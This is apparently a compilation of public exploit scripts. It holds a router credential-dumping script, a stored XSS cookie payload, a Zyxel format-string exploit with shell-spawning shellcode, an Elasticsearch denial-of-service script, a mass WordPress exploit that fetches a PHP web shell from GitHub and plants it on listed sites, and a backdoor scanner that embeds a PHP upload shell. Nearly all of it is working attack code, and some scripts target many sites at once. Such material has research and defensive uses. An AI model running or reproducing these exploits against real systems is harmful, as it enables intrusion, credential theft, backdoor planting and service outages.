deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D
%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0' }); };
-
Milesight Routers UR5X, UR32L, UR32, UR35, UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption
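#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
CVE: CVE-2023-43261
Script Author: Bipin Jitiya (@win3zz)
Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
Software/Hardware: UR5X, UR32L, UR32, UR35, UR41; other Milesight industrial cellular routers may also be affected.
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf

How it works
------------
The router serves its web-server log at /lang/log/httpd.log without authentication.
That log contains logged login bodies of the form "username":"...","password":"...".
The password field is not a hash: it is AES-128-CBC ciphertext under a static
key and IV (KEY / IV below), so anyone who can read the log can recover every
password that was ever submitted.

Usage
-----
    python3 script.py https://router.example
    python3 script.py -f urls.txt        # one base URL per line; blank lines ignored
"""
import base64
import re
import sys
import time
import warnings

import requests
from Crypto.Cipher import AES  # pip install pycryptodome
from Crypto.Util.Padding import unpad

# Routers use self-signed certificates; verify=False below would otherwise spam warnings.
warnings.filterwarnings("ignore")

# Static AES-128-CBC key and IV used by the router's web UI to "encrypt" the
# password field before submission. Both are constant, so the scheme is
# trivially reversible - the weak-encryption half of CVE-2023-43261.
KEY = b'1111111111111111'
IV = b'2222222222222222'

# Unauthenticated log path that leaks the credentials.
LOG_PATH = '/lang/log/httpd.log'
# Matches the logged JSON login bodies; compiled once since it runs per target.
CRED_RE = re.compile(r'"username":"(.*?)","password":"(.*?)"')
# Seconds to wait for connect/read before giving up on one target.
REQUEST_TIMEOUT = 15

COLORS = {
    'red': '\033[91m',
    'green': '\033[92m',
    'blue': '\033[94m',
    'yellow': '\033[93m',
    'cyan': '\033[96m',
    'end': '\033[0m',
}


def display_output(message, color):
    """Print *message* wrapped in the ANSI colour *color*, then pause briefly.

    Args:
        message: Text to print.
        color: One of 'red', 'green', 'blue', 'yellow', 'cyan' (keys of COLORS).

    Raises:
        KeyError: if *color* is not a known colour name.
    """
    print(f"{COLORS[color]}{message}{COLORS['end']}")
    # Short pause so the output is readable as it scrolls past.
    time.sleep(0.5)


def decrypt_password(password):
    """Decrypt one logged password value.

    Args:
        password: Base64-encoded AES-128-CBC ciphertext, as str or bytes.

    Returns:
        The plaintext password, or None when the value cannot be decoded
        (bad base64, wrong length, bad padding or non-UTF-8 plaintext).
        binascii.Error and UnicodeDecodeError are ValueError subclasses, so
        the single except clause covers all of those cases.
    """
    try:
        raw = base64.b64decode(password)
        plaintext = unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(raw), AES.block_size)
        return plaintext.decode('utf-8')
    except ValueError as e:
        display_output(' [-] Error occurred during password decryption: ' + str(e), 'red')
        return None


def parse_targets(argv):
    """Return the base URLs named on the command line.

    Accepts either a single URL or ``-f FILE`` with one URL per line.
    Blank lines and surrounding whitespace are dropped and a trailing slash is
    stripped so the log URL does not become ``host//lang/log/httpd.log``.

    Args:
        argv: The full argument vector (``sys.argv``-style, program name first).

    Returns:
        A possibly empty list of normalised base URLs.
    """
    urls = []
    if len(argv) == 2 and argv[1] != '-f':
        urls.append(argv[1])
    if len(argv) == 3 and argv[1] == '-f':
        with open(argv[2], 'r') as file:
            urls.extend(file.read().splitlines())
    return [u.strip().rstrip('/') for u in urls if u.strip()]


def dump_credentials(url, proxies):
    """Fetch the leaked log from one router and print every decrypted credential.

    Args:
        url: Normalised base URL of the router (no trailing slash).
        proxies: ``requests`` proxies mapping, or None.

    Returns:
        None. Network failures are reported and skipped so a batch run
        continues with the next target.
    """
    log_url = url + LOG_PATH
    display_output('[*] Initiating data retrieval for: ' + log_url, 'blue')
    try:
        # verify=False: device certificates are self-signed.
        response = requests.get(log_url, proxies=proxies, verify=False, timeout=REQUEST_TIMEOUT)
    except requests.exceptions.RequestException as e:
        display_output('[-] Data retrieval failed for: ' + url + ' (' + str(e) + ')', 'red')
        return

    if response.status_code != 200:
        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')
        return

    display_output('[+] Data retrieval successful for: ' + log_url, 'green')
    credentials = set(CRED_RE.findall(response.text))
    display_output(f'[+] Found {len(credentials)} unique credentials for: ' + url, 'green')
    if not credentials:
        display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
        return

    display_output('[+] Login page: ' + url + '/login.html', 'green')
    display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
    display_output('[+] Unique Credentials:', 'yellow')
    # sorted() gives a stable order across runs; the original set order was arbitrary.
    for i, (username, password) in enumerate(sorted(credentials), start=1):
        display_output(f' Credential {i}:', 'cyan')
        decrypted_password = decrypt_password(password.encode('utf-8'))
        display_output(f' - Username: {username}', 'green')
        display_output(f' - Password: {decrypted_password}', 'green')


def main(argv=None):
    """Entry point: parse targets, then dump credentials from each router."""
    argv = sys.argv if argv is None else argv
    urls = parse_targets(argv)
    if not urls:
        display_output('Please provide a URL or a file with a list of URLs.', 'red')
        display_output('Example: python3 ' + argv[0] + ' https://example.com', 'blue')
        display_output('Example: python3 ' + argv[0] + ' -f urls.txt', 'blue')
        sys.exit(1)

    # Flip to True to route traffic through a local intercepting proxy. Both
    # schemes are mapped because targets are normally https; an http-only
    # mapping would silently be ignored for them.
    use_proxy = False
    proxies = (
        {'http': 'http://127.0.0.1:8080/', 'https': 'http://127.0.0.1:8080/'}
        if use_proxy else None
    )

    for url in urls:
        dump_credentials(url, proxies)


if __name__ == '__main__':
    main()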
-
Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 11.10.2023 # Exploit Author: Furkan ÖZER # Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/ # Version: 8.0.5 # Tested on: Kali-Linux,Windows10,Windows 11 # CVE: N/A # Description: Advanced Page Visit Counter is a remarkable Google Analytics alternative specifically designed for WordPress websites, and it has quickly become a must-have plugin for website owners and administrators seeking powerful tracking and analytical capabilities. With the recent addition of Enhanced eCommerce Tracking for WooCommerce, this plugin has become even more indispensable for online store owners. Homepage | Support | Premium Version If you’re in search of a GDPR-friendly website analytics plugin exclusively designed for WordPress, look no further than Advanced Page Visit Counter. This exceptional plugin offers a compelling alternative to Google Analytics and is definitely worth a try for those seeking enhanced data privacy compliance. This is a free plugin and doesn’t require you to create an account on another site. All features outlined below are included in the free plugin. Description of the owner of the plugin Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the Advanced Page Visit Counter plugin. 2. Visit the "Settings" interface available in settings page of the plugin that is named "Widget Settings" 3. In the plugin's "Today's Count Label" setting field, enter the payload Payload: " "type=image src=1 onerror=alert(document.cookie)> " 6. 
Click the "Save Changes" button. 7. The XSS then triggers on the plugin's settings page on every visit by an authenticated user, because the stored "Today's Count Label" value is rendered without escaping. # Video Link https://youtu.be/zcfciGZLriM
-
Zyxel zysh - Format string
#!/usr/bin/expect -f
#
# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
# Copyright (c) 2022 Marco Ivaldi <[email protected]>
#
# "We live on a placid island of ignorance in the midst of black seas of
# infinity, and it was not meant that we should voyage far."
# -- H. P. Lovecraft, The Call of Cthulhu
#
# "Multiple improper input validation flaws were identified in some CLI
# commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71,
# USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware
# versions 4.32 through 5.21, VPN series firmware versions 4.30 through
# 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500
# firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware
# version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version
# 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2)
# and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and
# earlier versions, that could allow a local authenticated attacker to
# cause a buffer overflow or a system crash via a crafted payload."
# -- CVE-2022-26531
#
# The zysh binary is a restricted shell that implements the command-line
# interface (CLI) on multiple Zyxel products. This proof-of-concept exploit
# demonstrates how to leverage the format string bugs I have identified in
# the "extension" argument of some zysh commands, to execute arbitrary code
# and escape the restricted shell environment.
#
# - This exploit targets the "ping" zysh command.
# - It overwrites the .got entry of fork() with the shellcode address.
# - The shellcode address is calculated based on a leaked stack address.
# - Hardcoded offsets and values might need some tweaking, see comments.
# - Automation/weaponization for other targets is left as an exercise.
#
# For additional details on my bug hunting journey and on the
# vulnerabilities themselves, you can refer to the official advisory:
# https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt
#
# Usage:
# raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password
# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
# Copyright (c) 2022 Marco Ivaldi <[email protected]>
#
# Leaked stack address: 0x7fe97170
# Shellcode address: 0x7fe9de40
# Base string length: 46
# Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn
#
# *** enjoy your shell! ***
#
# sh-5.1$ uname -snrmp
# Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0
# sh-5.1$ id
# uid=10007(admin) gid=10000(operator) groups=10000(operator)
#
# Tested on:
# Zyxel USG20-VPN with Firmware 5.10
# [other appliances/versions are also likely vulnerable]
#
# NOTE(review): this is a post-authentication exploit: it needs a valid
# SSH login (argv: host, user, pass) and then escapes the restricted zysh
# shell. The resulting uid in the transcript above is the CLI user, not root.
# The prompt pattern, offsets and the 'diff' constant are tuned for one
# firmware build; expect to re-derive them for any other target.

# change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8
encoding system iso8859-1

# hostile format string to leak stack address via direct parameter access
set offset1 77
set leak [format "AAAA.0x%%%d\$x" $offset1]

# offsets to reach addresses in retloc sled via direct parameter access
set offset2 1801
set offset3 [expr $offset2 + 1]

# difference between leaked stack address and shellcode address
set diff 27856

# retloc sled
# $ mips64-linux-readelf -a zysh | grep JUMP | grep fork
# 112dd558 0000967f R_MIPS_JUMP_SLOT 00000000 fork@GLIBC_2.0
# ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2]
# The four addresses are consumed by the four writes of the hostile format
# string below (%n, %hn, %hhn at 112dd558, then %hhn at 112dd55a).
set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024]

# nop sled
# nop-equivalent instruction: xor $t0, $t0, $t0
set nops [string repeat "\x01\x8c\x60\x26" 64]

# shellcode
# https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c
# NOTE(review): the bytes below spell "/bin" "/shh" and end in syscall
# number 0x17a9 (6057 = n32 execve), i.e. a local execve("/bin/sh")
# shellcode; this matches the "sh-5.1$" prompt in the usage transcript but
# not the "revsh" filename in the link above - verify the reference.
set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c"

# padding to align payload in memory (might need adjusting)
set padding "AAA"

# print header
send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n"
send_user "Copyright (c) 2022 Marco Ivaldi <[email protected]>\n\n"

# check command line
if { [llength $argv] != 3} {
    send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n"
    exit 1
}

# get SSH connection parameters
set port "22"
set host [lindex $argv 0]
set user [lindex $argv 1]
set pass [lindex $argv 2]

# inject payload via the TERM environment variable
# (retloc sled + nop sled + shellcode + padding; ssh forwards TERM to the
# remote session, which is how the payload lands in the zysh process)
set env(TERM) $retloc$nops$sc$padding

# connect to target via SSH
# NOTE(review): StrictHostKeyChecking=no disables host-key verification, so
# the plaintext credentials from argv go to whoever answers on $host:$port.
# Fine for a lab; pin the host key before running this against anything
# reachable over an untrusted network.
log_user 0
spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user
expect {
    -nocase "password*" { send "$pass\r" }
    default {
        send_error "error: could not connect to ssh\n"
        exit 1
    }
}

# leak stack address
# The "extension" argument is echoed back through the vulnerable format
# function; %77$x reads a stack slot and ping reports it as an unknown host.
expect {
    "Router? $" { send "ping 127.0.0.1 extension $leak\r" }
    default {
        send_error "error: could not access zysh prompt\n"
        exit 1
    }
}
expect {
    -re "ping: unknown host AAAA\.(0x.*)\r\n" { }
    default {
        send_error "error: could not leak stack address\n"
        exit 1
    }
}
set leaked $expect_out(1,string)
send_user "Leaked stack address:\t$leaked\n"

# calculate shellcode address
set retval [expr $leaked + $diff]
set retval [format 0x%x $retval]
send_user "Shellcode address:\t$retval\n"

# extract each byte of shellcode address
set b1 [expr ($retval & 0xff000000) >> 24]
set b2 [expr ($retval & 0x00ff0000) >> 16]
set b3 [expr ($retval & 0x0000ff00) >> 8]
set b4 [expr ($retval & 0x000000ff)]
set b1 [format 0x%x $b1]
set b2 [format 0x%x $b2]
set b3 [format 0x%x $b3]
set b4 [format 0x%x $b4]

# calculate numeric arguments for the hostile format string
# The %n family writes the running character count, so each width is the
# delta needed to reach the next target byte (mod 256). Write order on the
# big-endian target: %n fills all four bytes with a count ending in b4,
# %hn rewrites the top two bytes so the second ends in b2, %hhn sets the
# first byte to b1, and the last %hhn (at +2) sets the third byte to b3.
set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3 "]
send_user "Base string length:\t$base\n"
set n1 [expr ($b4 - $base) % 0x100]
set n2 [expr ($b2 - $b4) % 0x100]
set n3 [expr ($b1 - $b2) % 0x100]
set n4 [expr ($b3 - $b1) % 0x100]

# check for dangerous numeric arguments below 10
if {$n1 < 10} { incr n1 0x100 }
if {$n2 < 10} { incr n2 0x100 }
if {$n3 < 10} { incr n3 0x100 }
if {$n4 < 10} { incr n4 0x100 }

# craft the hostile format string
set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4]
send_user "Hostile format string:\t$exploit\n\n"

# uncomment to debug
# interact +

# exploit target
# Success is detected by the prompt changing from the zysh prompt to a
# regular shell prompt ("#" or "$"); seeing the zysh prompt again means the
# GOT overwrite did not redirect fork().
set prompt "(#|\\\$) $"
expect {
    "Router? $" { send "ping 127.0.0.1 extension $exploit\r" }
    default {
        send_error "error: could not access zysh prompt\n"
        exit 1
    }
}
expect {
    "Router? $" {
        send_error "error: could not exploit target\n"
        exit 1
    }
    -re $prompt {
        send_user "*** enjoy your shell! ***\n"
        send "\r"
        interact
    }
    default {
        send_error "error: could not exploit target\n"
        exit 1
    }
}
-
Elasticsearch - StackOverflow DoS
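# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://elastic.co/
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
#
# Denial-of-service PoC: sends oversized `match` queries to the _search API.
# Each request body is roughly 45 MB (5000 random chars * 9000 repetitions,
# plus the comment/quote payload), and 100 of them are sent back to back, so
# run this only against a lab instance you own.
#
# NOTE(review): the requests are authenticated with basic auth below, i.e.
# this PoC exercises the bug from a credentialed position; it does not
# demonstrate an unauthenticated path.

import requests
import random
import string

es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
index_name = '*'
payload = "/*" * 10000 + "\\" + "'" * 999
# NOTE(review): False disables TLS certificate verification for the target;
# set to True unless the lab cluster uses a self-signed certificate.
verify_ssl = False
username = 'elastic'
password = 'changeme'
auth = (username, password)
num_queries = 100

for i in range(num_queries):
    # 5000 random alphanumeric/'^' characters, repeated 9000 times, then the payload
    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
    search_query = {"query": {"match": {"message": (symbols * 9000) + payload}}}
    print(f"Query {i + 1} - Search Query:")
    search_endpoint = f'{es_url}/{index_name}/_search'
    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
    if response.status_code == 200:
        search_results = response.json()
        print(f"Query {i + 1} - Response:")
        print(search_results)
        total_hits = search_results['hits']['total']['value']
        print(f"Query {i + 1}: Total hits: {total_hits}")
        for hit in search_results['hits']['hits']:
            source_data = hit['_source']
            # fixed: the original printed the literal text "{search_results}"
            # (missing f-prefix) and never used source_data
            print(f"Payload result: {source_data}")
    else:
        print(f"Error for query {i + 1}: {response.status_code} - {response.text}")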
-
Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
#
# Mass-exploitation script: for every URL in a list file it talks to the
# elFinder connector bundled with the plugin (connector.minimal.php), asks it
# to create a .php file, fills it with a PHP web shell and records the shell
# URL in result.txt.
#
# NOTE(review): put() downloads the web shell from raw.githubusercontent.com
# at run time with verify=False. Whoever controls that repository - or the
# network path, since TLS is not verified - controls the code uploaded to
# every target. Vendor the payload locally before using this on an engagement.
# The script also takes a whole list of hosts and scans them with a thread
# pool, so keep the list limited to in-scope targets.

import requests as req
import json
import sys
import random
import uuid
import urllib.parse
import urllib3
from multiprocessing.dummy import Pool as ThreadPool

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# random 8-character name for the uploaded .php file
filename="{}.php".format(str(uuid.uuid4())[:8])
proxies = {}
#proxies = {
#    'http': 'http://127.0.0.1:8080',
#    'https': 'http://127.0.0.1:8080',
#}
# elFinder target hash; presumably the root volume ("Lw" is base64 of "/") - verify
phash = "l1_Lw"
r=req.Session()
user_agent={ "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" }
r.headers.update(user_agent)


def is_json(myjson: str) -> bool:
    """Return True when *myjson* parses as JSON (json_object and e are unused)."""
    try:
        json_object = json.loads(myjson)
    except ValueError as e:
        return False
    return True


def mkfile(target: str):
    """Ask the elFinder connector at *target* to create `filename` under `phash`.

    Returns the hash of the created file, or False on a non-200 / non-JSON reply.
    """
    data={"cmd" : "mkfile", "target":phash, "name":filename}
    resp=r.post(target, data=data)
    respon = resp.text
    if resp.status_code == 200 and is_json(respon):
        # NOTE(review): this strips every "\/" (slash included) and every
        # backslash from the response before parsing; it works for the plain
        # hash string needed here but corrupts any other escaped value.
        resp_json=respon.replace(r"\/", "").replace("\\", "")
        resp_json=json.loads(resp_json)
        return resp_json["added"][0]["hash"]
    else:
        return False


def put(target: str, hash: str):
    """Fetch the remote PHP shell and write it into the file identified by *hash*.

    Returns True on HTTP 200, otherwise falls through and returns None.
    (The parameter shadows the builtin `hash`.)
    """
    content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
    content=content.text
    data={"cmd" : "put", "target":hash, "content": content}
    respon=r.post(target, data=data, proxies=proxies, verify=False)
    if respon.status_code == 200:
        return True


def exploit(target: str) -> None:
    """Run the full chain against one site and print [OK]/[FAIL].

    Successful shell URLs are appended to result.txt. SSL and connection
    errors are reported as [FAIL]; any other exception propagates.
    """
    try:
        vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
        respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
        if respon != 200:
            print("[FAIL] {}".format(target))
            return
        hash=mkfile(vuln_path)
        if hash == False:
            print("[FAIL] {}".format(target))
            return
        if put(vuln_path, hash):
            # the connector's volume root maps to the plugin's file_manager directory
            shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
            status = r.get(shell_path, proxies=proxies, verify=False).status_code
            if status==200 :
                with open("result.txt", "a") as newline:
                    newline.write("{}\n".format(shell_path))
                    newline.close()  # redundant inside the with-block
                print("[OK] {}".format(shell_path))
                return
            else:
                print("[FAIL] {}".format(target))
                return
        else:
            print("[FAIL] {}".format(target))
            return
    except req.exceptions.SSLError:
        print("[FAIL] {}".format(target))
        return
    except req.exceptions.ConnectionError:
        print("[FAIL] {}".format(target))
        return


def main() -> None:
    """Prompt for a thread count and a target list, then run exploit() over it."""
    threads = input("[?] Threads > ")
    list_file = input("[?] List websites file > ")
    print("[!] all result saved in result.txt")
    with open(list_file, "r") as file:
        lines = [line.rstrip() for line in file]
    th = ThreadPool(int(threads))
    th.map(exploit, lines)


if __name__ == "__main__":
    main()
-
Wordpress Seotheme - Remote Code Execution Unauthenticated
# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
#
# NOTE(review): despite the title, this script does not exploit anything.
# `shell` below is defined but never used, and FourHundredThree() only GETs
# /wp-content/plugins/seoplugins/mar.php and /wp-content/themes/seotheme/mar.php
# and looks for a MARIJUANA web-shell marker in the reply - it is a scanner
# for hosts that already carry that backdoor. Treat its hit lists as
# indicators of compromise, not as a vulnerability finding.
#
# NOTE(review): Python 2 code (print statements). Under Python 3 the
# `'...' in check.content` tests compare str with bytes and raise TypeError,
# which the bare `except:` swallows - every host would then print [Failed].
# Block nesting below was reconstructed from a line-collapsed listing.

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init

init(autoreset=True)
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA

# unused: never uploaded or referenced anywhere in this script
shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""

requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}

# target list: one site per line in the file named by argv[1]
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')


def URLdomain(site):
    """Reduce a URL to its host part: drop the scheme, then strip path
    components until no '/' remains (the greedy '(.*)/' keeps everything
    before the last slash on each pass)."""
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    """Probe one host for an existing mar.php web shell.

    Tries the plugin path over http then https, then the theme path over
    http then https; a hit is the MARIJUANA icon URL in the response body.
    Hits are appended to seoplugins-Shells.txt / seotheme-Shells.txt (file
    handles are never closed). The bare except reports any error as [Failed].
    """
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
            print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
            open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
                url = 'http://' + URLdomain(url)
                check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
                if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
                else:
                    url = 'https://' + URLdomain(url)
                    check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
                    if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                        print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                        open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
                    else:
                        print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
        # NOTE(review): bare except - timeouts, DNS failures and the py3
        # str/bytes TypeError all end up here and look like a clean miss
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)


# 100 concurrent probes against the whole list
mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()
# NOTE(review): the message names "Shells.txt" but the files written above
# are seoplugins-Shells.txt and seotheme-Shells.txt
print '\n [!] {}Saved in Shells.txt'.format(fc)